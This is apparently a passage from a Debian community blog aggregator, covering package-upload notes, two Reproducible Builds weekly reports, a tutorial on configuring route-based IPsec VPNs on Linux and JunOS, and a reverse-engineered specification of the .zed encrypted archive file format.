- 4:4.0.2-5: Replace the existing patch for CVE-2017-15047 with an upstream-blessed version that covers another case.
redisearch (0.21.3-5) Initial release.
docbook2man (2.0.0-40) Correct spelling mistakes in binaries and other misc packaging tidying.
python-redis (2.10.6-1) New upstream release.
bfs (1.1.3-1) New upstream release.

FTP Team

As a Debian FTP assistant I ACCEPTed 103 packages: amcheck, argagg, binutils, blockui, bro-pkg, chkservice, citus, django-axes, docker-containerd, doctest, dtkwidget, duktape, feed2exec, fontforge, fonttools, gcc-8, gcc-8-cross, generator-scripting-language, gitgraph.js, haskell-uri-encode, hoel, iniparser, its, jquery-areyousure, kodi, libcatmandu-mods-perl, libcatmandu-template-perl, libcatmandu-xml-perl, libcatmandu-xsd-perl, libcode-tidyall-plugin-sortlines-naturally-perl, libgdamm5.0, libinfinity, libmods-record-perl, libreoffice-dictionaries, libset-intervaltree-perl, libsodium, linux, linux-grsec, ltsp-manager, lxqt-themes, mailman3-core, measurement-kit, mini-buildd, musescore, node-babel, node-babel-eslint, node-babel-loader, node-babel-plugin-add-module-exports, node-babel-plugin-transform-define, node-gulp-newer, node-regenerate-unicode-properties, node-regexpu-core, node-regjsparser, node-unicode-data, node-unicode-loose-match, openjdk-9, orafce, pgaudit, pgsql-ogr-fdw, pk4, postgresql-mysql-fdw, powa-archivist, python-azure-devtools, python-colormap, python-darkslide, python-dotenv, python-karborclient, python-logfury, python-lupa, python-marshmallow, python-murano-pkg-check, python-octaviaclient, python-pathspec, python-pgpy, python-pydub, python-randomize, python-sabyenc, python-searchlightclient, python-stestr, python-subunit2sql, python-twitter, python-utils, python-wsgilog, r-cran-bindr, r-cran-desc, r-cran-hms, r-cran-readstata13, r-cran-rprojroot, r-cran-wikidatar, r-cran-wikipedir, r-cran-wikitaxa, repmgr, requests-file, resteasy3.0, sdl-kitchensink, stardicter, systemd-el, thunderbird, tomcat8.0, uwsgi-plugin-luajit, uwsgi-plugin-mongo, uwsgi-plugin-php & uwsgi-plugin-v8. I additionally filed 3 RC bugs against packages that had incomplete debian/copyright files against: fonttools, generator-scripting-language & libsodium.

17 October 2017

Reproducible builds folks: Reproducible Builds: Weekly report #129

Here's what happened in the Reproducible Builds effort between Sunday October 8 and Saturday October 14 2017: Upcoming events

On Saturday 21st October, Holger Levsen will present at All Systems Go! in Berlin, Germany on reproducible builds.
On Tuesday 24th October, Chris Lamb will present at All Things Open 2017 in Raleigh, NC, USA on reproducible builds.
On Wednesday 25th October, Holger Levsen will present at the Open Source Summit Europe in Prague, Czech Republic on reproducible builds.

From October 31st - November 2nd we will be holding the 3rd Reproducible Builds summit in Berlin. If you are working in the field of reproducible builds, you should totally be there. Please contact us if you have any questions! Quoting from the public invitation mail:

These dates are inclusive, ie. the summit will be 3 full days from "9 to 5".
Best arrive on Monday October 30th and leave on the evening of Thursday, 3rd
at the earliest.
Meeting content
===============
The exact content of the meeting is going to be shaped by the
participants, but here are the main goals:
 - Update & exchange about the status of reproducible builds in various
   projects.
 - Establish spaces for more strategic and long-term thinking than is possible
   in virtual channels.
 - Improve collaboration both between and inside projects.
 - Expand the scope and reach of reproducible builds to more projects.
 - Brainstorming / Designing several things, eg:
  - designing tools enabling end-users to get the most benefits from
    reproducible builds.
  - design of back-ends needed for that.
 - Work together and hack on solutions.
There will be a huge variety of topics to be discussed. To give a few
examples:
- continuing design and development work on .buildinfo infrastructure
- build-path issues everywhere
- future directions for diffoscope, reprotest & strip-nondeterminism
- reproducing signed artifacts such as RPMs
- discussing formats and tools we can share
- sharing proposals for standards and documentation helpful to spreading the
  reproducible effort
- and many many more.
Please think about what you want discuss, brainstorm & learn about at this
meeting!
Schedule
========
Preliminary schedule for the three days:
9:00 Welcome and breakfast
9:30 Meeting starts
12:30 Lunch
17:00 End of the official schedule
Gunner and Beatrice from Aspiration will help running the meeting. We will
collect your input in subsequent emails to make the best of everyone's time.
Feel free to start thinking about what you want to achieve there. We will also
adjust topics as the meeting goes.
Please note that we are very likely to spend large parts of the meeting away
from laptops and closer to post-it notes. So make sure you've answered any
critical emails *before* Tuesday morning! :)

Reproducible work in other projects Pierre Pronchery reported that that he has built the foundations for doing more reproducibility work in NetBSD. Packages fixed Upstream bugs and patches:

Bernhard M. Wiedemann:
- qutim used RANDOM which is unpredictable and unreproducible.
- dpdk used locale-dependent sort.

Reproducibility non-maintainer uploads in Debian:

Chris Lamb:
- mailfront for bugs #777431 & #847020.
- plib-doc for bugs #778971 & #557676.
- ipsvd for bugs #777417 & #846890.
Holger Levsen
- keyutils for bug #828681.

QA fixes in Debian:

Adrian Bunk:
- #878329 filed against sonic-visualiser.
- #878333 filed against tree-puzzle.

Reviews of unreproducible packages 6 package reviews have been added, 30 have been updated and 37 have been removed in this week, adding to our knowledge about identified issues. Weekly QA work During our reproducibility testing, FTBFS bugs have been detected and reported by:

Adrian Bunk (40)
Eric Valette (1)
Markus Koschany (1)

diffoscope development

Ximin Luo:
- Containers: diff the metadata of containers in one central location in the code, so that deep-diff works between all combinations of different container types. This lets us finally close #797759.
- Tests: add a complete set of cases to test all pairs of container types.
Chris Lamb:
- Temporarily skip the test for ps2ascii(1) in ghostscript > 9.21 which now outputs text in a slightly different format.
- UI wording improvements.

reprotest development Version 0.7.3 was uploaded to unstable by Ximin Luo. It included contributions already covered by posts of the previous weeks, as well as new ones:

Ximin Luo:
- Add a --env-build option for testing builds under different sets of environment variables. This is meant to help the discussion over at #876055 about how we should deal with different types of environment variables in a stricter definition of reproducibility.
- UI and logging tweaks and improvements.
- Simplify the _shell_ast module and merge it into shell_syn.

Misc. This week's edition was written by Ximin Luo, Chris Lamb and Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

26 September 2017

Reproducible builds folks: Reproducible Builds: Weekly report #126

Here's what happened in the Reproducible Builds effort between Sunday September 17th and Saturday September 23rd 2017: Media coverage

Christos Zoulas gave a talk entitled Reproducible builds on NetBSD at EuroBSDCon 2017

Reproducible work in other packages

Paul Eggert reported that TZ=UTC is not a portable setting for the TZ environment variable.

Packages reviewed and fixed, and bugs filed

Adrian Bunk:
- #876615 filed against librsvg.
Bernhard M. Wiedemann:
- varnish (random IDs)
- make (sort)
- nautilus-dropbox (extended date)
- fontforge (date)
- votca-csg (merged, date)
- freeipmi (merged, date)
- libmypaint (merged, sort)
- doomsday (merged, sort)
- asciidoc (help make release with SOURCE_DATE_EPOCH patch)

Reviews of unreproducible packages 1 package reviews was added, 49 have been updated and 54 have been removed in this week, adding to our knowledge about identified issues. One issue type was updated:

gtk_doc_api_index_full (fixed upstream: #779090)

Weekly QA work During our reproducibility testing, FTBFS bugs have been detected and reported by:

Adrian Bunk (56)
Bas Couwenberg (1)
Helmut Grohne (1)
Nobuhiro Iwamatsu (2)

diffoscope development Version 87 was uploaded to unstable by Mattia Rizzolo. It included contributions from:

strip-nondeterminism development

Chris Lamb:
- Log which handler procesed a file. (Closes: #876140)
- Bump Standards-Version to 4.1.0.

reprotest development Version 0.7 was uploaded to unstable by Ximin Luo:

Ximin Luo:

tests.reproducible-builds.org Vagrant Cascadian and Holger Levsen:

Re-add and armhf build node that had been disabled due to performance issues, but works linux 4.14-rc1 now! #876212

Holger Levsen:

Use botch from stretch to fix the jenkins job which create the package sets. (botch is currently uninstallable in sid and from pre-stretch-release times we used a sid schroot to install and use botch.)

Misc. This week's edition was written by Bernhard M. Wiedemann, Chris Lamb, Vagrant Cascadian & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

13 September 2017

Vincent Bernat: Route-based IPsec VPN on Linux with strongSwan

A common way to establish an IPsec tunnel on Linux is to use an IKE daemon, like the one from the strongSwan project, with a minimal configuration¹:

conn V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64
  authby      = psk
  auto        = route

The same configuration can be used on both sides. Each side will figure out if it is left or right . The IPsec site-to-site tunnel endpoints are 2001:db8: 1::1 and 2001:db8: 2::1. The protected subnets are 2001:db8: a1::/64 and 2001:db8: a2::/64. As a result, strongSwan configures the following policies in the kernel:

$ ip xfrm policy
src 2001:db8:a1::/64 dst 2001:db8:a2::/64
        dir out priority 399999 ptype main
        tmpl src 2001:db8:1::1 dst 2001:db8:2::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir fwd priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir in priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
[ ]

This kind of IPsec tunnel is a policy-based VPN: encapsulation and decapsulation are governed by these policies. Each of them contains the following elements:

a direction (out, in or fwd²),
a selector (source subnet, destination subnet, protocol, ports),
a mode (transport or tunnel),
an encapsulation protocol (esp or ah), and
the endpoint source and destination addresses.

When a matching policy is found, the kernel will look for a corresponding security association (using reqid and the endpoint source and destination addresses):

$ ip xfrm state
src 2001:db8:1::1 dst 2001:db8:2::1
        proto esp spi 0xc1890b6e reqid 4 mode tunnel
        replay-window 0 flag af-unspec
        auth-trunc hmac(sha256) 0x5b68[ ]8ba2904 128
        enc cbc(aes) 0x8e0e377ad8fd91e8553648340ff0fa06
        anti-replay context: seq 0x0, oseq 0x0, bitmap 0x00000000
[ ]

If no security association is found, the packet is put on hold and the IKE daemon is asked to negotiate an appropriate one. Otherwise, the packet is encapsulated. The receiving end identifies the appropriate security association using the SPI in the header. Two security associations are needed to establish a bidirectionnal tunnel:

$ tcpdump -pni eth0 -c2 -s0 esp
13:07:30.871150 IP6 2001:db8:1::1 > 2001:db8:2::1: ESP(spi=0xc1890b6e,seq=0x222)
13:07:30.872297 IP6 2001:db8:2::1 > 2001:db8:1::1: ESP(spi=0xcf2426b6,seq=0x204)

All IPsec implementations are compatible with policy-based VPNs. However, some configurations are difficult to implement. For example, consider the following proposition for redundant site-to-site VPNs: Redundant VPNs between 3 sites

A possible configuration between V1-1 and V2-1 could be:

conn V1-1-to-V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64,2001:db8:a6::cc:1/128,2001:db8:a6::cc:5/128
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64,2001:db8:a6::/64,2001:db8:a8::/64
  authby      = psk
  keyexchange = ikev2
  auto        = route

Each time a subnet is modified on one site, the configurations need to be updated on all sites. Moreover, overlapping subnets (2001:db8: a6::/64 on one side and 2001:db8: a6::cc:1/128 at the other) can also be problematic. The alternative is to use route-based VPNs: any packet traversing a pseudo-interface will be encapsulated using a security policy bound to the interface. This brings two features:

Routing daemons can be used to distribute routes to be protected by the VPN. This decreases the administrative burden when many subnets are present on each side.
Encapsulation and decapsulation can be executed in a different routing instance or namespace. This enables a clean separation between a private routing instance (where VPN users are) and a public routing instance (where VPN endpoints are).

Route-based VPN on Juniper Before looking at how to achieve that on Linux, let s have a look at the way it works with a JunOS-based platform (like a Juniper vSRX). This platform as long-standing history of supporting route-based VPNs (a feature already present in the Netscreen ISG platform). Let s assume we want to configure the IPsec VPN from V3-2 to V1-1. First, we need to configure the tunnel interface and bind it to the private routing instance containing only internal routes (with IPv4, they would have been RFC 1918 routes):

interfaces  
    st0  
        unit 1  
            family inet6  
                address 2001:db8:ff::7/127;
             
         
     
 
routing-instances  
    private  
        instance-type virtual-router;
        interface st0.1;

The second step is to configure the VPN:

security  
    /* Phase 1 configuration */
    ike  
        proposal IKE-P1  
            authentication-method pre-shared-keys;
            dh-group group20;
            encryption-algorithm aes-256-gcm;
         
        policy IKE-V1-1  
            mode main;
            proposals IKE-P1;
            pre-shared-key ascii-text "d8bdRxaY22oH1j89Z2nATeYyrXfP9ga6xC5mi0RG1uc";
         
        gateway GW-V1-1  
            ike-policy IKE-V1-1;
            address 2001:db8:1::1;
            external-interface lo0.1;
            general-ikeid;
            version v2-only;
         
     
    /* Phase 2 configuration */
    ipsec  
        proposal ESP-P2  
            protocol esp;
            encryption-algorithm aes-256-gcm;
         
        policy IPSEC-V1-1  
            perfect-forward-secrecy keys group20;
            proposals ESP-P2;
         
        vpn VPN-V1-1  
            bind-interface st0.1;
            df-bit copy;
            ike  
                gateway GW-V1-1;
                ipsec-policy IPSEC-V1-1;
             
            establish-tunnels on-traffic;

We get a route-based VPN because we bind the st0.1 interface to the VPN-V1-1 VPN. Once the VPN is up, any packet entering st0.1 will be encapsulated and sent to the 2001:db8: 1::1 endpoint. The last step is to configure BGP in the private routing instance to exchange routes with the remote site:

routing-instances  
    private  
        routing-options  
            router-id 1.0.3.2;
            maximum-paths 16;
         
        protocols  
            bgp  
                preference 140;
                log-updown;
                group v4-VPN  
                    type external;
                    local-as 65003;
                    hold-time 6;
                    neighbor 2001:db8:ff::6 peer-as 65001;
                    multipath;
                    export [ NEXT-HOP-SELF OUR-ROUTES NOTHING ];

The export filter OUR-ROUTES needs to select the routes to be advertised to the other peers. For example:

policy-options  
    policy-statement OUR-ROUTES  
        term 10  
            from  
                protocol ospf3;
                route-type internal;
             
            then  
                metric 0;
                accept;

The configuration needs to be repeated for the other peers. The complete version is available on GitHub. Once the BGP sessions are up, we start learning routes from the other sites. For example, here is the route for 2001:db8: a1::/64:

> show route 2001:db8:a1::/64 protocol bgp table private.inet6.0 best-path
private.inet6.0: 15 destinations, 19 routes (15 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both
2001:db8:a1::/64   *[BGP/140] 01:12:32, localpref 100, from 2001:db8:ff::6
                      AS path: 65001 I, validation-state: unverified
                      to 2001:db8:ff::6 via st0.1
                    > to 2001:db8:ff::14 via st0.2

It was learnt both from V1-1 (through st0.1) and V1-2 (through st0.2). The route is part of the private routing instance but encapsulated packets are sent/received in the public routing instance. No route-leaking is needed for this configuration. The VPN cannot be used as a gateway from internal hosts to external hosts (or vice-versa). This could also have been done with JunOS security policies (stateful firewall rules) but doing the separation with routing instances also ensure routes from different domains are not mixed and a simple policy misconfiguration won t lead to a disaster.

Route-based VPN on Linux Starting from Linux 3.15, a similar configuration is possible with the help of a virtual tunnel interface³. First, we create the private namespace:

# ip netns add private
# ip netns exec private sysctl -qw net.ipv6.conf.all.forwarding=1

Any private interface needs to be moved to this namespace (no IP is configured as we can use IPv6 link-local addresses):

# ip link set netns private dev eth1
# ip link set netns private dev eth2
# ip netns exec private ip link set up dev eth1
# ip netns exec private ip link set up dev eth2

Then, we create vti6, a tunnel interface (similar to st0.1 in the JunOS example):

# ip tunnel add vti6 \
   mode vti6 \
   local 2001:db8:1::1 \
   remote 2001:db8:3::2 \
   key 6
# ip link set netns private dev vti6
# ip netns exec private ip addr add 2001:db8:ff::6/127 dev vti6
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_policy=1
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_xfrm=1
# ip netns exec private ip link set vti6 mtu 1500
# ip netns exec private ip link set vti6 up

The tunnel interface is created in the initial namespace and moved to the private one. It will remember its original namespace where it will process encapsulated packets. Any packet entering the interface will temporarily get a firewall mark of 6 that will be used only to match the appropriate IPsec policy⁴ below. The kernel sets a low MTU on the interface to handle any possible combination of ciphers and protocols. We set it to 1500 and let PMTUD do its work. We can then configure strongSwan⁵:

conn V3-2
  left        = 2001:db8:1::1
  leftsubnet  = ::/0
  right       = 2001:db8:3::2
  rightsubnet = ::/0
  authby      = psk
  mark        = 6
  auto        = route
  keyexchange = ikev2
  keyingtries = %forever
  ike         = aes256gcm16-prfsha384-ecp384!
  esp         = aes256gcm16-prfsha384-ecp384!
  mobike      = no

The IKE daemon configures the following policies in the kernel:

$ ip xfrm policy
src ::/0 dst ::/0
        dir out priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:1::1 dst 2001:db8:3::2
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir fwd priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir in priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
[ ]

Those policies are used for any source or destination as long as the firewall mark is equal to 6, which matches the mark configured for the tunnel interface. The last step is to configure BGP to exchange routes. We can use BIRD for this:

router id 1.0.1.1;
protocol device  
   scan time 10;
 
protocol kernel  
   persist;
   learn;
   import all;
   export all;
   merge paths yes;
 
protocol bgp IBGP_V3_2  
   local 2001:db8:ff::6 as 65001;
   neighbor 2001:db8:ff::7 as 65003;
   import all;
   export where ifname ~ "eth*";
   preference 160;
   hold time 6;

Once BIRD is started in the private namespace, we can check routes are learned correctly:

$ ip netns exec private ip -6 route show 2001:db8:a3::/64
2001:db8:a3::/64 proto bird metric 1024
        nexthop via 2001:db8:ff::5  dev vti5 weight 1
        nexthop via 2001:db8:ff::7  dev vti6 weight 1

The above route was learnt from both V3-1 (through vti5) and V3-2 (through vti6). Like for the JunOS version, there is no route-leaking between the private namespace and the initial one. The VPN cannot be used as a gateway between the two namespaces, only for encapsulation. This also prevent a misconfiguration (for example, IKE daemon not running) from allowing packets to leave the private network. As a bonus, unencrypted traffic can be observed with tcpdump on the tunnel interface:

$ ip netns exec private tcpdump -pni vti6 icmp6
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vti6, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
20:51:15.258708 IP6 2001:db8:a1::1 > 2001:db8:a3::1: ICMP6, echo request, seq 69
20:51:15.260874 IP6 2001:db8:a3::1 > 2001:db8:a1::1: ICMP6, echo reply, seq 69

You can find all the configuration files for this example on GitHub. The documentation of strongSwan also features a page about route-based VPNs.

Everything in this post should work with Libreswan.
fwd is for incoming packets on non-local addresses. It only makes sense in transport mode and is a Linux-only particularity.
Virtual tunnel interfaces (VTI) were introduced in Linux 3.6 (for IPv4) and Linux 3.12 (for IPv6). Appropriate namespace support was added in 3.15. KLIPS, an alternative out-of-tree stack available since Linux 2.2, also features tunnel interfaces.
The mark is set right before doing a policy lookup and restored after that. Consequently, it doesn t affect other possible uses (filtering, routing). However, as Netfilter can also set a mark, one should be careful for conflicts.
The ciphers used here are the strongest ones currently possible while keeping compatibility with JunOS. The documentation for strongSwan contains a complete list of supported algorithms as well as security recommendations to choose them.

10 September 2017

Sylvain Beucler: dot-zed archive file format

TL,DR: I reverse-engineered the .zed encrypted archive format.
Following a clean-room design, I'm providing a description that can be implemented by a third-party.
Interested?

(reference version at: https://www.beuc.net/zed/) .zed archive file format Introduction Archives with the .zed extension are conceptually similar to an encrypted .zip file. In addition to a specific format, .zed files support multiple users: files are encrypted using the archive master key, which itself is encrypted for each user and/or authentication method (password, RSA key through certificate or PKCS#11 token). Metadata such as filenames is partially encrypted. .zed archives are used as stand-alone or attached to e-mails with the help of a MS Outlook plugin. A variant, which is not covered here, can encrypt/decrypt MS Windows folders on the fly like ecryptfs. In the spirit of academic and independent research this document provides a description of the file format and encryption algorithms for this encrypted file archive. See the conventions section for conventions and acronyms used in this document. Structure overview The .zed file format is composed of several layers.

The main container is using the (MS-CFB), which is notably used by MS Office 97-2003 .doc files. It contains several streams:
- Metadata stream: in OLE Property Set format (MS-OLEPS), contains 2 blobs in a specific Type-Length-Value (TLV) format:
  - _ctlfile: global archive properties and access list
    It is obfuscated by means of static-key AES encryption.
    The properties include archive initial filename and a global IV.
    A global encryption key is itself encrypted in each user entry.
  - _catalog: file list
    Contains each file metadata indexed with a 15-bytes identifier.
    Directories are supported.
    Full filename is encrypted using AES.
    File extension is (redundantly) stored in clear, and so are file metadata such as modification time.
- Each file in the archive compressed with zlib and encrypted with the standard AES algorithm, in a separate stream.
  Several encryption schemes and key sizes are supported.
  The file stream is split in chunks of 512 bytes, individually encrypted.
- Optional streams, contain additional metadata as well as pictures to display in the application background ("watermarks"). They are not discussed here.

Or as a diagram:

+----------------------------------------------------------------------------------------------------+
  .zed archive (MS-CBF)                                                                               
                                                                                                      
   stream #1                         stream #2                       stream #3...                     
  +------------------------------+  +---------------------------+  +---------------------------+      
    metadata (MS-OLEPS)               encryption (AES)               encryption (AES)                 
                                      512-bytes chunks               512-bytes chunks                 
    +--------------------------+                                                                      
      obfuscation (static key)        +-----------------------+      +-----------------------+        
      +----------------------+       -  compression (zlib)     -    -  compression (zlib)     -       
       _ctlfile (TLV)                                                                            ...  
      +----------------------+          +---------------+              +---------------+               
    +--------------------------+          file contents                  file contents                
                                                                                                      
    +--------------------------+     -  +---------------+      -    -  +---------------+      -       
      _catalog (TLV)                                                                                  
    +--------------------------+      +-----------------------+      +-----------------------+        
  +------------------------------+  +---------------------------+  +---------------------------+      
+----------------------------------------------------------------------------------------------------+

Encryption schemes Several AES key sizes are supported, such as 128 and 256 bits. The Cipher Block Chaining (CBC) block cipher mode of operation is used to decrypt multiple AES 16-byte blocks, which means an initialisation vector (IV) is stored in clear along with the ciphertext. All filenames and file contents are encrypted using the same encryption mode, key and IV (e.g. if you remove and re-add a file in the archive, the resulting stream will be identical). No cleartext padding is used during encryption; instead, several end-of-stream handlers are available, so the ciphertext has exactly the size of the cleartext (e.g. the size of the compressed file). The following variants were identified in the 'encryption_mode' field. STREAM This is the end-of-stream handler for:

obfuscated metadata encrypted with static AES key
filenames and files in archives with 'encryption_mode' set to "AES-CBC-STREAM"
any AES ciphertext of size < 16 bytes, regardless of encryption mode

This end-of-stream handler is apparently specific to the .zed format, and applied when the cleartext's does not end on a 16-byte boundary ; in this case special processing is performed on the last partial 16-byte block. The encryption and decryption phases are identical: let's assume the last partial block of cleartext (for encryption) or ciphertext (for decryption) was appended after all the complete 16-byte blocks of ciphertext:

the second-to-last block of the ciphertext is encrypted in AES-ECB mode (i.e. block cipher encryption only, without XORing with the IV)
then XOR-ed with the last partial block (hence truncated to the length of the partial block)

In either case, if the full ciphertext is less then one AES block (< 16 bytes), then the IV is used instead of the second-to-last block. CTS CTS or CipherText Stealing is the end-of-stream handler for:

filenames and files in archives with 'encryption_mode' set to "AES-CBC-CTS".
- exception: if the size of the ciphertext is < 16 bytes, then "STREAM" is used instead.

It matches the CBC-CS3 variant as described in Recommendation for Block Cipher Modes of Operation: Three Variants of Ciphertext Stealing for CBC Mode. Empty cleartext Since empty filenames or metadata are invalid, and since all files are compressed (resulting in a minimum 8-byte zlib cleartext), no empty cleartext was encrypted in the archive. metadata stream It is named 05356861616161716149656b7a6565636e576a33317a7868304e63 (hexadecimal), i.e. the character with code 5 followed by '5haaaaqaIekzeecnWj31zxh0Nc' (ASCII). The format used is OLE Property Set (MS-OLEPS). It introduces 2 property names "_ctlfile" (index 3) and "_catalog" (index 4), and 2 instances of said properties each containing an application-specific VT_BLOB (type 0x0041). _ctlfile: obfuscated global properties and access list This subpart is stored under index 3 ("_ctlfile") of the MS-OLEPS metadata. It consists of:

static delimiter 0765921A2A0774534752073361719300 (hexadecimal) followed by 0100 (hexadecimal) (18 bytes total)
16-byte IV
ciphertext
1 uint32be representing the length of all the above
static delimiter 0765921A2A0774534752073361719300 (hexadecimal) followed by "ZoneCentral (R)" (ASCII) and a NUL byte (32 bytes total)

The ciphertext is encrypted with AES-CBC "STREAM" mode using 128-bit static key 37F13CF81C780AF26B6A52654F794AEF (hexadecimal) and the prepended IV so as to obfuscate the access list. The ciphertext is continuous and not split in chunks (unlike files), even when it is larger than 512 bytes. The decrypted text contain properties in a TLV format as described in _ctlfile TLV:

global archive properties as a 'fileprops' structure,
extra archive properties as a 'archive_extraprops' structure
users access list as a series of 'passworduser' and 'rsauser entries.

Archives may include "mandatory" users that cannot be removed. They are typically used to add an enterprise wide recovery RSA key to all archives. Extreme care must be taken to protect these key, as it can decrypt all past archives generated from within that company. _catalog: file list This subpart is stored under index 4 ("_catalog") of the MS-OLEPS metadata. It contains a series of 'fileprops' TLV structures, one for each file or directory. The file hierarchy can be reconstructed by checking the 'parent_id' field of each file entry. If 'parent_id' is 0 then the file is located at the top-level of the hierarchy, otherwise it's located under the directory with the matching 'file_id'. TLV format This format is a series of fields :

4 bytes for Type (specified as a 4-bytes hexadecimal below)
4 bytes for value Length (uint32be)
Value

Value semantics depend on its Type. It may contain an uint32be integer, a UTF-16LE string, a character sequence, or an inner TLV structure. Unless otherwise noted, TLV structures appear once. Some fields are optional and may not be present at all (e.g. 'archive_createdwith'). Some fields are unique within a structure (e.g. 'files_iv'), other may be repeated within a structure to form a list (e.g. 'fileprops' and 'passworduser'). The following top-level types that have been identified, and detailed in the next sections:

80110600: fileprops, used for the file list as well as for the global archive properties
001b0600: archive_extraprops
80140600: accesslist

Some additional unidentified types may be present. _ctlfile TLV

80110600: fileprops (TLV structure): global archive properties
- 00230400: archive_pathname (UTF-16LE string): initial archive filename (past versions also leaked the full pathname of the initial archive)
- 80270200: encryption_mode (utf32be): 103 for "AES-CBC-STREAM", 104 for "AES-CBC-CTS"
- 80260200: encryption_strength (utf32be): AES key size, in bytes (e.g. 32 means AES with a 256-bit key)
- 80280500: files_iv (sequence of bytes): global IV for all filenames and file contents
001b0600: archive_extraprops (TLV structure): additionnal archive properties (optional)
- 00c40500: archive_creationtime (FILETIME): date and time when archive was initially created (optional)
- 00c00400: archive_createdwith (UTF-16LE string): uuid-like structure describing the application that initialized the archive (optional)
  00000188-1000-3CA8-8868-36F59DEFD14D is Zed! Free 1.0.188.
80140600: accesslist (TLV structure): describe the users, their key encryption and their permissions
- 80610600: passworduser (TLV structure): user identified by password (0 or more)
- 80620600: rsauser (TLV structure): user identified by RSA key (via file or PKCS#11 token) (0 or more)
- Fields common to passworduser and rsauser:
  - 80710400: login (UTF-16LE string): user name
  - 80720300: login_md5 (sequence of bytes): used by the application to search for a user name
  - 807e0100: priv1 (uchar): user privileges; present and set to 1 when user is admin (optional)
  - 00830200: priv2 (uint32be): user privileges; present and set to 2 when user is admin, present and set to 5 when user is a marked as mandatory, e.g. for recovery keys (optional)
  - 80740500: files_key_ciphertext (sequence of bytes): the archive encryption key, itself encrypted
  - 00840500: user_creationtime (FILETIME): date and time when the user was added to the archive
- passworduser-specific fields:
  - 80760500: pbe_salt (sequence of bytes): salt for PBE
  - 80770200: pbe_iter (uint32be): number of iterations for PBE
  - 80780200: pkcs12_hashfunc (uint32be): hash function used for PBE and PBA key derivation
  - 80790500: pba_checksum (sequence of bytes): password derived with PBA to check for password validity
  - 807a0500: pba_salt (sequence of bytes): salt for PBA
  - 807b0200: pba_iter (uint32be): number of iterations for PBA
- rsauser-specific fields:
  - 807d0500: certificate (sequence of bytes): user X509 certificate in DER format

_catalog TLV

80110600: fileprops (TLV structure): describe the archive files (0 or more)
- 80300500: file_id (sequence of bytes): a 16-byte unique identifier
- 80310400: filename_halfanon (UTF-16LE string): half-anonymized filename, e.g. File1.txt (leaking filename extension)
- 00380500: filename_ciphertext (sequence of bytes): encrypted filename; may have a trailing NUL byte once decrypted
- 80330500: file_size (uint64le): decompressed file size in bytes
- 80340500: file_creationtime (FILETIME): file creation date and time
- 80350500: file_lastwritetime (FILETIME): file last modification date and time
- 80360500: file_lastaccesstime (FILETIME): file last access date and time
- 00370500: parent_directory_id (sequence of bytes): file_id of the parent directory, 0 is top-level
- 80320100: is_dir (uint32be): 1 if entry is directory (optional)

Decrypting the archive AES key rsauser The user accessing the archive will be authenticated by comparing his/her X509 certificate with the one stored in the 'certificate' field using DER format. The 'files_key_ciphertext' field is then decrypted using the PKCS#1 v1.5 encryption mechanism, with the private key that matches the user certificate. passworduser An intermediary user key, a user IV and an integrity checksum will be derived from the user password, using the deprecated PKCS#12 method as described at rfc7292 appendix B. Note: this is not PKCS#5 (nor PBKDF1/PBKDF2), this is an incompatible method from PKCS#12 that notably does not use HMAC. The 'pkcs12_hashfunc' field defines the underlying hash function. The following values have been identified:

21: SHA-1
22: SHA-256

PBA - Password-based authentication The user accessing the archive will be authenticated by deriving an 8-byte sequence from his/her password. The parameters for the derivation function are:

ID: 3
'pba_salt': the salt, typically an 8-byte random sequence
'pba_iter': the iteration count, typically 200000

The derivation is checked against 'pba_checksum'. PBE - Password-based encryption Once the user is identified, 2 new values are derived from the password with different parameters to produce the IV and the key decryption key, with the same hash function:

'pbe_salt': the salt, typically an 8-bytes random sequence
'pbe_iter': the iteration count, typically 100000

The parameters specific to user key are:

ID: 1
size: 32

The user key needs to be truncated to a length of 'encryption_strength', as specified in bytes in the archive properties. The parameters specific to user IV are:

ID: 2
size: 16

Once the key decryption key and the IV are derived, 'files_key_ciphertext' is decrypted using AES CBC, with PKCS#7 padding. Identifying file streams The name of the MS-CFB stream is derived by shuffling the bytes from the 'file_id' field and then encoding the result as hexadecimal. The reordering is:

Initial  offset: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Shuffled offset: 3 2 1 0 5 4 7 6 8 9 10 11 12 13 14 15

The 16th byte is usually a NUL byte, hence the stream identifier is a 30-character-long string. Decrypting files The compressed stream is split in chunks of 512 bytes, each of them encrypted separately using AES CBS and the global archive encryption scheme. Decryption uses the global AES key (retrieved using the user credentials), and the global IV (retrieved from the deobfuscated archive metadata). The IV for each chunk is computed by:

expressing the current chunk number as little endian on 16 bytes
XORing it with the global IV
encrypting with the global AES key in ECB mode (without IV).

Each chunk is an independent stream and the decryption process involves end-of-stream handling even if this is not the end of the actual file. This is particularly important for the CTS handler. Note: this is not to be confused with CTR block cipher mode of operation with operates differently and requires a nonce. Decompressing files Compressed streams are zlib stream with default compression options and can be decompressed following the zlib format. Test cases Excluded for brevity, cf. https://www.beuc.net/zed/#test-cases. Conventions and references

uint32le: unsigned int on 4 bytes, little endian.
uint32be: unsigned int on 4 bytes, big endian.
